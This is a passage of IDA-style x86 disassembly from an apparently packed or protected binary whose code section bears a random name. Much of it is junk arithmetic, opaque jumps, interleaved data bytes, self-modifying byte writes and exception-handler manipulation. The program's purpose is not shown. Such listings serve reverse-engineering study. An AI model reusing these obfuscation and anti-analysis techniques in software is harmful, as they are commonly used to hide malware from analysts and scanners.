dd 0DD45F6D2h, 5840F01h, 0E9000000h, 0FFFFF432h, 0FFFF33E8h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_48BB76: ; CODE XREF: znnrn47v:loc_48A57Ej
; sub_48A5BC:loc_48A857j
jmp loc_48A9F7
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_48A920
loc_48BB7C: ; CODE XREF: sub_48A920:loc_48A9C4j
sub edx, 1456CF31h
rol edx, 5
push offset byte_48C095
jmp loc_48CC9A
; END OF FUNCTION CHUNK FOR sub_48A920
; ---------------------------------------------------------------------------
align 10h
db 0
; ---------------------------------------------------------------------------
loc_48BB91: ; CODE XREF: znnrn47v:loc_4898CDj
push 5A33C1ACh
pop edx
sub edx, 299FF5B5h
rol edx, 6
jmp loc_48BDA2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48BBA5: ; CODE XREF: sub_48C14F:loc_48B280j
mov byte ptr [esi], 9Ch
pop esi
xor eax, 0EDA58785h
add ebp, 0FFFFFF81h
ror byte ptr [ecx+edi*2+8B5FFCh], 56h
jmp loc_48B1ED
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
dd 0C7810000h, 527CC7h
dword_48BBC8 dd 243C8721h ; DATA XREF: znnrn47v:loc_48B7B5o
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48BACA
loc_48BBCD: ; CODE XREF: sub_48BACA+9j
jmp loc_48C547
; END OF FUNCTION CHUNK FOR sub_48BACA
; ---------------------------------------------------------------------------
dw 0E900h
dd 0FFFFE615h, 4898B668h, 0DF90E900h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_48BBE2: ; DATA XREF: znnrn47v:0048AF03o
add eax, esi
pop esi
mov eax, [eax]
or al, al
jmp loc_48C1D7
; ---------------------------------------------------------------------------
add esp, 4
push offset sub_48C8C2
jmp locret_48AC78
; ---------------------------------------------------------------------------
loc_48BBFB: ; CODE XREF: znnrn47v:loc_48B2A1j
push 8F32CD34h
pop edi
or edi, 6F2D01B6h
add edi, 1108E802h
jmp loc_48B40F
; ---------------------------------------------------------------------------
dw 0B00h
dd 0A2FE9D3h, 0C60000h, 0EE81588Bh, 0F41F49DFh, 0E912C6C1h
dd 0F7Fh, 0E90000C3h, 0FFFFEB63h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48BC36: ; CODE XREF: znnrn47v:0048B97Aj
or edx, edx
jz loc_48C222
push esi
call sub_487FA1
; ---------------------------------------------------------------------------
dd 0E0C10000h, 2414870Ah, 8B240C87h, 0B1E959D1h, 0FFFFEAh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A71A
loc_48BC58: ; CODE XREF: sub_48A71A+9j
xchg edx, [esp+4+var_4]
mov ebp, esp
push edx
push ecx
jmp loc_48C0A7
; END OF FUNCTION CHUNK FOR sub_48A71A
; ---------------------------------------------------------------------------
db 2 dup(0)
word_48BC66 dw 487h ; DATA XREF: sub_48A5BC+458o
dd 0D92DE924h, 0FFFFh, 0FFE454E8h, 0DBD5E9FFh, 2C68FFFFh
dd 0E90048B4h, 0FFFFCBE1h, 794FED81h, 880FDE53h, 0FFFFF180h
dd 0FFBDEAE9h
db 0FFh
; ---------------------------------------------------------------------------
loc_48BC95: ; CODE XREF: znnrn47v:00489224j
sbb eax, 0C7B994E9h
cmp ecx, 0E3400899h
jmp loc_48A3BA
; ---------------------------------------------------------------------------
test edx, 0B332093Ch
jmp loc_489206
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C93E
loc_48BCB1: ; CODE XREF: sub_48C93E:loc_48A3CCj
pushf
push 0D6336221h
pop ebx
sub ebx, 0B8F5936Dh
add ebx, 0E30AFC2Fh
jmp loc_48BA0B
; END OF FUNCTION CHUNK FOR sub_48C93E
; ---------------------------------------------------------------------------
db 2 dup(0), 0C3h
dd 54DE900h, 0E9000000h, 0FFFFFC78h, 5E3F6857h, 815FFA44h
dd 4938D5EFh, 0B3F7811Bh, 0E98CCEC0h, 0FFFFED74h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48BCF2: ; CODE XREF: znnrn47v:00489760j
mov byte ptr [ebx], 30h
xchg esi, [esp]
mov ebx, esi
pop esi
call sub_48CA24
mov byte ptr [eax], 87h
pop eax
call sub_48B1BE
call loc_488EC0
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
loc_48BD10: ; CODE XREF: znnrn47v:00489B4Aj
jmp near ptr dword_4894E4+4
; ---------------------------------------------------------------------------
loc_48BD15: ; CODE XREF: znnrn47v:00489C87j
test eax, 1
jz loc_48C4C0
push 4894BBh
jmp near ptr dword_487F14+2Fh
; ---------------------------------------------------------------------------
dw 8500h
dd 10C9E9C7h, 81000000h, 9945E9C7h, 243C0CBAh, 0FFE9D9E9h
dd 176800FFh, 0E90048B3h, 1348h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48BD4D: ; CODE XREF: sub_48C14F+A6j
push 488E50h
jmp nullsub_608
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
align 4
mov edi, [ebx]
jmp loc_48C6A7
; ---------------------------------------------------------------------------
align 10h
push edx
xchg edi, [esp]
pop edi
pop ebx
xchg ecx, [esp]
mov edi, ecx
pop ecx
jmp loc_48CADF
; ---------------------------------------------------------------------------
db 2 dup(0), 0Fh
dd 0FFCFA888h
db 0FFh
; =============== S U B R O U T I N E =======================================
sub_48BD79 proc near ; CODE XREF: znnrn47v:loc_48C6F2p
; FUNCTION CHUNK AT 00488228 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048954A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B0BC SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048B874 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
mov byte ptr [eax], 3
pop eax
push ebx
mov ebx, edi
jmp loc_48B874
sub_48BD79 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_48BD89: ; CODE XREF: znnrn47v:0048B24Cj
or esi, 0A8F6E561h
and esi, 8D1E558Bh
push offset loc_48AEFD
jmp locret_4891F6
; ---------------------------------------------------------------------------
align 10h
retn
; ---------------------------------------------------------------------------
align 2
loc_48BDA2: ; CODE XREF: znnrn47v:0048BBA0j
jmp near ptr dword_487ACC+1C2h
; ---------------------------------------------------------------------------
loc_48BDA7: ; CODE XREF: znnrn47v:loc_48D0B4j
jnz loc_488C48
add [edi-317216E1h], al
; ---------------------------------------------------------------------------
db 0FFh
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; START OF FUNCTION CHUNK FOR sub_48B1BE
loc_48BDB6: ; CODE XREF: sub_48B1BE:loc_48A4DDj
mov eax, [eax]
push ebx
mov ebx, edx
xchg ebx, [esp+4+var_4]
mov edx, offset loc_48BF7B
jmp loc_48BF75
; END OF FUNCTION CHUNK FOR sub_48B1BE
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_48BDC9 proc near ; CODE XREF: sub_48A5BC-FE7p
; znnrn47v:0048D0F0j
xchg edx, [esp+0]
pop edx
push edx
call sub_48AADF
loc_48BDD3: ; CODE XREF: znnrn47v:0048CBE4j
jmp nullsub_598
sub_48BDC9 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C11B
loc_48BDD9: ; CODE XREF: sub_48C11B+4CBj
jmp loc_48B64F
; END OF FUNCTION CHUNK FOR sub_48C11B
; ---------------------------------------------------------------------------
dw 7E9h
dd 0FFFFDAh, 0C2AE9h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_48BDEB: ; CODE XREF: znnrn47v:loc_4898FAj
jmp loc_487FC5
; ---------------------------------------------------------------------------
jmp loc_488298
; ---------------------------------------------------------------------------
align 2
retn
; ---------------------------------------------------------------------------
align 4
shl eax, 3
jmp sub_48CD09
; ---------------------------------------------------------------------------
dd 68C3F700h, 0E9CE92A3h, 0FFFFBC62h, 24348700h, 0ADC6815Eh
dd 8761E639h, 0AEE92434h
db 0FEh, 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_48BE1F proc near ; CODE XREF: znnrn47v:004899D0p
xchg ecx, [esp+0]
pop ecx
push edx
push offset dword_489C1C
jmp nullsub_604
sub_48BE1F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488549
loc_48BE2E: ; CODE XREF: sub_488549+2542j
push offset byte_48947D
jmp near ptr loc_48A9DF+1
; END OF FUNCTION CHUNK FOR sub_488549
; ---------------------------------------------------------------------------
dd 0FC3F8F0Fh, 1487FFFFh, 0C1815A24h, 87E6EE3Fh, 6850CD03h
dd 4B52DDEDh, 0AEE9h, 0E8000000h, 0FFFFC86Dh
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_48BE5E: ; CODE XREF: sub_48A5BC+45Dj
jmp nullsub_600
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
align 4
dd 8102CAC1h, 7FB82AFEh, 0D532E9D4h, 0FFFFh, 0CC73EF81h
dd 0C681007Bh, 0ABB4DDD1h, 0FFC035E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B1BE
loc_48BE87: ; CODE XREF: sub_48B1BE:loc_487D84j
push offset byte_489865
jmp loc_48D0AF
; END OF FUNCTION CHUNK FOR sub_48B1BE
; ---------------------------------------------------------------------------
align 2
dw 68h
; ---------------------------------------------------------------------------
retf 48h
; ---------------------------------------------------------------------------
db 0E9h
dd 0B5Ch
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 2
loc_48BE9E: ; DATA XREF: sub_48CA24-1233o
push 31810274h
push edx
mov edx, offset loc_48A845
jmp loc_48A4A4
; ---------------------------------------------------------------------------
mov eax, offset dword_48C488
jmp loc_48CDC1
; ---------------------------------------------------------------------------
dd 0C1130000h, 0E913E7C1h, 0FFFFC25Fh, 4870000h, 0BD9D5824h
dd 47E92404h, 0FFFFE8h, 0FFBD70E9h, 1E900FFh
db 0F5h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_48BEDF: ; CODE XREF: znnrn47v:0048A33Dj
mov byte ptr [edx], 85h
push offset byte_48CCE3
jmp loc_48B92A
; ---------------------------------------------------------------------------
dd 0C0810000h, 35EA94C4h, 6B54C081h, 8BCA15h, 88EE8h, 0E9000000h
dd 0FFFFEE3Eh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A541
loc_48BF08: ; CODE XREF: sub_48A541:loc_489DDEj
mov byte ptr [eax], 9Ch
xchg ebx, [esp-4+arg_0]
mov eax, ebx
pop ebx
mov ebx, ebp
loc_48BF13: ; DATA XREF: sub_48A541+5o
xchg ebx, [esp-8+arg_4]
jmp loc_4887B8
; END OF FUNCTION CHUNK FOR sub_48A541
; ---------------------------------------------------------------------------
align 4
dd 0E9F10300h, 0FFFFF8ABh
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C93E
loc_48BF26: ; CODE XREF: sub_48C93E:loc_488A3Dj
push offset word_48CD4A
jmp nullsub_616
; END OF FUNCTION CHUNK FOR sub_48C93E
; ---------------------------------------------------------------------------
dd 8A0F0000h, 0FFFFD7FDh, 0FFEA2FE9h, 0C6C100FFh, 0F879E91Ah
dd 689CFFFFh, 48BEEEh, 0FFEB03E9h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48BF51: ; CODE XREF: sub_48C14F+4Dj
jge loc_488505
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
db 0
dd 3D58100h, 3BCE4A00h, 0CA9E9FBh, 34870000h, 0C0815E24h
dd 0BA9586A3h, 0FFEC88E8h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B1BE
loc_48BF75: ; CODE XREF: sub_48B1BE+C05j
mov byte ptr [edx], 0Fh
pop edx
or eax, eax
loc_48BF7B: ; DATA XREF: sub_48B1BE+C00o
jnz loc_4892EA
jmp loc_48C23C
; END OF FUNCTION CHUNK FOR sub_48B1BE
; ---------------------------------------------------------------------------
align 4
jmp loc_4892EA
; ---------------------------------------------------------------------------
db 2 dup(0), 57h
; ---------------------------------------------------------------------------
mov edi, offset loc_48B1B6
jmp loc_489144
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
locret_48BF9B: ; CODE XREF: znnrn47v:00488D62j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48BF9E: ; CODE XREF: znnrn47v:00489F32j
and ebx, 256243ABh
rol ebx, 0Ah
test ebx, 10000000h
jmp loc_48C76E
; ---------------------------------------------------------------------------
align 4
locret_48BFB4: ; CODE XREF: znnrn47v:loc_489594j
retn
; ---------------------------------------------------------------------------
popf
jmp sub_488D12
; ---------------------------------------------------------------------------
align 4
loc_48BFBC: ; CODE XREF: znnrn47v:loc_48CA60j
rol eax, 9
push 4881E2h
jmp loc_48AE54
; ---------------------------------------------------------------------------
db 2 dup(0), 68h
dd offset loc_48B8B4
dd 0FFDC22E9h, 680000FFh, 0F9ABCACFh, 0FFD2C2E9h, 8B0F00FFh
dd 0FFFFD178h, 830BFA81h, 50E981B1h
db 0C5h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
locret_48BFF3: ; CODE XREF: znnrn47v:loc_48BFF6j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48BFF6: ; CODE XREF: znnrn47v:00488269j
jmp locret_48BFF3
; ---------------------------------------------------------------------------
align 4
dd 61139968h, 0EB815B14h, 322D8274h, 862BCB81h, 0E38177B7h
dd 8163724Eh, 88A0C381h, 0FCE97F25h, 0Eh, 0EF90E9C3h, 0FFFFh
dd 559E9h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48C02D: ; CODE XREF: sub_48C14F:loc_48C33Aj
; znnrn47v:0048CCD8j
jz near ptr dword_48A0B0+1
jnb loc_48C605
push 48AD2Dh
jmp near ptr dword_488C14+1
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
align 4
loc_48C044: ; CODE XREF: znnrn47v:00488EE1j
push offset dword_48B9BC
jmp loc_48CEA6
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48C04F: ; DATA XREF: znnrn47v:loc_48A986o
push 0E3A7A48h
pop ecx
or ecx, 0DBD2B3BBh
rol ecx, 1
push edi
jmp loc_48C49F
; ---------------------------------------------------------------------------
align 4
dd 24148700h, 8B240C87h, 685B59D1h, 48AA90h, 0FFE45FE9h
dd 0C15A00FFh, 0C28107C2h, 564CEA0h, 3399E281h, 0C281FE41h
dd 18489BA2h, 5C7E9h
db 0
byte_48C095 db 81h, 0C2h, 94h ; DATA XREF: sub_48A920+1265o
db 90h
db 7Bh, 86h, 0E9h
dd 0FFFFDB51h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489135
loc_48C0A0: ; CODE XREF: sub_489135:loc_48A6D7j
call near ptr dword_487ACC+1AFh
; END OF FUNCTION CHUNK FOR sub_489135
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A71A
loc_48C0A7: ; CODE XREF: sub_48A71A+1545j
jmp loc_488904
; END OF FUNCTION CHUNK FOR sub_48A71A
; ---------------------------------------------------------------------------
jno loc_489325
xchg esi, [esp]
pop esi
pushf
jmp loc_4898CD
; ---------------------------------------------------------------------------
pop edx
push 487F2Ah
jmp loc_48C3D3
; ---------------------------------------------------------------------------
align 4
pop large dword ptr fs:0
add esp, 4
retn
; ---------------------------------------------------------------------------
align 4
dd 0D5BE900h, 51000000h, 8EC35968h, 3BE95920h, 0FFFFC3h
dd 48A51468h, 91AE900h
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B41C
loc_48C0F3: ; CODE XREF: sub_48B41C+7j
xor ebx, 0D73ADF9Fh
sub ebx, 0EA4CB129h
rol ebx, 5
or ebx, 7EE6F6B9h
add ebx, 8051A2AAh
jmp near ptr loc_48A19B+1
; END OF FUNCTION CHUNK FOR sub_48B41C
; ---------------------------------------------------------------------------
align 4
dd 6A800F00h
db 0F7h, 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_48C11B proc near ; CODE XREF: znnrn47v:0048BAF7p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004895B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B64F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0048BA83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BDD9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C5D9 SIZE 00000012 BYTES
xchg ebx, [esp+0]
pop ebx
push esi
pushf
push 93D47A08h
pop esi
and esi, 0F98B0BB9h
jmp loc_48C5D9
sub_48C11B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov byte ptr [edx], 0C3h
pop edx
or ebx, 0C16C1282h
rol ebx, 18h
push 4888A7h
jmp loc_489594
; ---------------------------------------------------------------------------
db 2 dup(0), 59h
db 33h, 2 dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48C14F proc near ; CODE XREF: sub_48A71Aj
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0048847F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00488505 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004885DA SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004887CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00488B76 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00488BD7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004894D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00489532 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004896FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004899D5 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00489BC4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00489D83 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048A488 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0048A8DA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A93D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048AC6C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AD66 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048B15A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B1ED SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048B280 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B328 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B774 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048BBA5 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048BD4D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048BF51 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048C02D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048C33A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0048C605 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048C652 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048C7CF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048C895 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CA53 SIZE 0000000B BYTES
push ebp
mov ebp, esp
jmp loc_48C2B0
; ---------------------------------------------------------------------------
align 4
dd 5E243487h, 0FFD167E9h
db 0FFh
; ---------------------------------------------------------------------------
locret_48C161: ; CODE XREF: znnrn47v:00488E36j
retn
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48C163: ; CODE XREF: znnrn47v:0048AD59j
jmp near ptr dword_4880FC+45h
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48C16A: ; CODE XREF: sub_48A5BC+100j
jmp near ptr dword_48A34C+6
; ---------------------------------------------------------------------------
align 10h
dd 0F454E900h, 6800FFFFh, 48B334h, 896E9h
db 0
; ---------------------------------------------------------------------------
loc_48C181: ; CODE XREF: znnrn47v:0048B8D5j
popf
push 4898A8h
jmp nullsub_615
; ---------------------------------------------------------------------------
dd 0C3810000h, 35BEA979h, 0FFDF45E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
loc_48C19B: ; CODE XREF: znnrn47v:0048A6F7j
pop ebx
jmp loc_48BF51
; ---------------------------------------------------------------------------
align 2
loc_48C1A2: ; CODE XREF: znnrn47v:00488E89j
sub esi, 23081160h
rol esi, 0Ah
sub esi, 0F2BA2599h
push edi
push 1D86DD82h
pop edi
and edi, 684A9132h
jmp loc_48CA53
; ---------------------------------------------------------------------------
align 4
dd 0CB815B00h, 9CD1C98Eh, 8B03C381h, 99E86372h
db 0D4h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_48C1D7: ; CODE XREF: znnrn47v:0048BBE9j
jmp loc_48C33A
; ---------------------------------------------------------------------------
loc_48C1DC: ; CODE XREF: znnrn47v:00489C6Aj
jmp loc_48B15A
; ---------------------------------------------------------------------------
align 2
dw 2E9h
dd 0FFFFE3h
db 0
; ---------------------------------------------------------------------------
loc_48C1E9: ; CODE XREF: znnrn47v:0048A031j
and edi, 0A66044DAh
add edi, 0FBE88A08h
jmp loc_48BD4D
; ---------------------------------------------------------------------------
or ecx, eax
jmp loc_489BC4
; ---------------------------------------------------------------------------
db 2 dup(0), 0F7h
; ---------------------------------------------------------------------------
xlat
loc_48C205: ; CODE XREF: znnrn47v:0048963Fj
jmp near ptr dword_48924C+3Ch
; ---------------------------------------------------------------------------
align 4
dd 3FF2F881h, 0DBE9003Ah, 87FFFFE0h, 0BE6EE91Ah, 7100FFFFh
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48C222: ; CODE XREF: sub_489135:loc_489DA9j
; znnrn47v:0048BC38j
call loc_48A3A7
jmp loc_48A93D
; ---------------------------------------------------------------------------
dd 51FF8100h, 0E98D97DCh, 0FFFFFB3Bh, 240C8700h
; CODE XREF: znnrn47v:loc_48CC7Dp
; ---------------------------------------------------------------------------
loc_48C23C: ; CODE XREF: sub_48B1BE+DC3j
pop ecx
mov byte ptr [eax], 87h
pop eax
jmp near ptr dword_487ACC+0F9h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_48C249: ; CODE XREF: znnrn47v:004890F4j
jmp loc_48C7CF
; ---------------------------------------------------------------------------
align 10h
dd 5F3107C6h, 7241EA81h, 0C2C11D71h, 97E16813h, 98E90048h
dd 8BFFFFF7h, 5DF28103h, 0E93A1926h, 0FFFFC926h, 0DAE0E99Ch
dd 0FFFFh
; ---------------------------------------------------------------------------
loc_48C27C: ; DATA XREF: znnrn47v:0048A157o
push 0C54A8E16h
xchg ecx, [esp+0Ch+var_C]
mov eax, ecx
pop ecx
xor eax, 7F3EDBACh
jmp loc_4885DA
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48C293: ; CODE XREF: sub_489135-77Ej
rol eax, 2
xor eax, 8C788586h
add eax, 9D2D9535h
add edx, eax
push 48863Bh
jmp loc_488510
; ---------------------------------------------------------------------------
align 10h
loc_48C2B0: ; CODE XREF: sub_48C14F+3j
push esi
mov esi, ecx
xchg esi, [esp+0]
push edi
push 37A60C54h
pop edi
jmp loc_488BD7
sub_48C14F endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_612. PRESS KEYPAD "+" TO EXPAND]
align 4
dd 588700C6h, 22546857h, 815FC601h, 0CB063DCFh, 24F781F1h
dd 0E9B26451h, 0FFFFD209h, 59240C87h, 0FFFA78E8h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488669
loc_48C2E9: ; CODE XREF: sub_488669+6j
jmp loc_4899B9
; END OF FUNCTION CHUNK FOR sub_488669
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C8B3
loc_48C2EE: ; CODE XREF: sub_48C8B3+Aj
push edx
mov edx, ecx
loc_48C2F1: ; DATA XREF: znnrn47v:00489CCBo
xchg edx, [esp+4+var_4]
push edi
push offset dword_48BA50
jmp near ptr loc_48B1D6+1
; END OF FUNCTION CHUNK FOR sub_48C8B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488955
loc_48C2FF: ; CODE XREF: sub_488955+1AB1j
; sub_488955+1AC1j
jnz loc_4880C8
adc ebp, ebx
xchg edi, [ecx]
push ebp
jmp loc_4880C1
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
dd 0E875E581h, 0E95AB35Dh, 0FFFFB793h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488B8D
loc_48C31E: ; CODE XREF: sub_488B8D+7j
or ebx, 31589D85h
add ebx, 8EE8CAD6h
jmp loc_48D0BB
; END OF FUNCTION CHUNK FOR sub_488B8D
; ---------------------------------------------------------------------------
align 10h
dd 487FE268h, 0F8F5E900h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48C33A: ; CODE XREF: sub_48C14F:loc_48C1D7j
jz loc_48C02D
push 0CCC3D1DEh
pop eax
push edx
mov edx, edi
xchg edx, [esp+0]
mov edi, 487E0Bh
jmp near ptr dword_488C7C+0Bh
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488549
loc_48C357: ; CODE XREF: sub_488549:loc_48AE3Aj
rol edi, 1Ch
and edi, 64547AA7h
cmp edi, 21832673h
jmp loc_48CEA0
; END OF FUNCTION CHUNK FOR sub_488549
; ---------------------------------------------------------------------------
align 4
push 489BB7h
jmp loc_489FF3
; ---------------------------------------------------------------------------
dw 8100h
dd 7A2926F2h, 0B6C2816Eh, 0E984804Ch, 0FFFFE267h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48C38A: ; CODE XREF: znnrn47v:0048B708j
xchg eax, [esp]
pop eax
xchg ebx, [esp]
mov ebp, esp
call sub_48D039
add cl, ch
movsb
in al, 0FFh
inc dword ptr [eax]
add [edi+72E9243Ch], al
jecxz short near ptr loc_48C3A5+1 ; CODE XREF: znnrn47v:loc_48C3A5j
inc dword ptr [eax]
jmp near ptr dword_48A2A4+17h
; ---------------------------------------------------------------------------
dw 9EE9h
dd 0FFFFFBEh, 8EE81h, 20685100h, 0E9343DD0h, 0FFFFBE94h
db 0
; =============== S U B R O U T I N E =======================================
sub_48C3C5 proc near ; CODE XREF: znnrn47v:00489966j
; sub_48C14F:loc_48B15Ap
; FUNCTION CHUNK AT 004883ED SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push offset loc_48ACCC
jmp loc_4883ED
sub_48C3C5 endp
; ---------------------------------------------------------------------------
loc_48C3D3: ; CODE XREF: znnrn47v:0048C0C2j
retn
; ---------------------------------------------------------------------------
loc_48C3D4: ; CODE XREF: znnrn47v:0048B8AFj
jmp near ptr byte_4897B1+2
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
; ---------------------------------------------------------------------------
dec ebx
retn
; ---------------------------------------------------------------------------
dw 0FFFFh
; ---------------------------------------------------------------------------
rol ebx, 18h
jmp loc_48A9D0
; ---------------------------------------------------------------------------
dd 3C870000h, 8B2E6824h, 0F5E90048h, 9
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_487FA1
loc_48C3F9: ; CODE XREF: sub_487FA1+10j
sub esi, 6DB0901Ah
jnb loc_48B25B
add [ecx-64C3510Fh], al
push esi
jmp loc_489D52
; END OF FUNCTION CHUNK FOR sub_487FA1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B7C0
loc_48C411: ; CODE XREF: sub_48B7C0+Aj
rol esi, 0Dh
; END OF FUNCTION CHUNK FOR sub_48B7C0
; START OF FUNCTION CHUNK FOR sub_489135
loc_48C414: ; CODE XREF: sub_489135:loc_48C5ECj
sub esi, 0E2D7E62h
add esi, 7B0DA7BFh
mov esi, [esi]
mov ecx, ds:dword_48B140
push 4BBD57EEh
xchg esi, [esp+0]
mov edx, esi
jmp loc_48A8A8
; END OF FUNCTION CHUNK FOR sub_489135
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_48C439: ; CODE XREF: znnrn47v:0048AA64j
add eax, edi
pop edi
mov eax, [eax]
call sub_489645
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
loc_48C445: ; CODE XREF: znnrn47v:00489128j
jp near ptr dword_487A48+13h
xchg eax, [esp]
pop eax
mov byte ptr [edx], 85h
pop edx
push edx
push 0FD07B06Bh
jmp loc_4880E2
; ---------------------------------------------------------------------------
dw 1487h
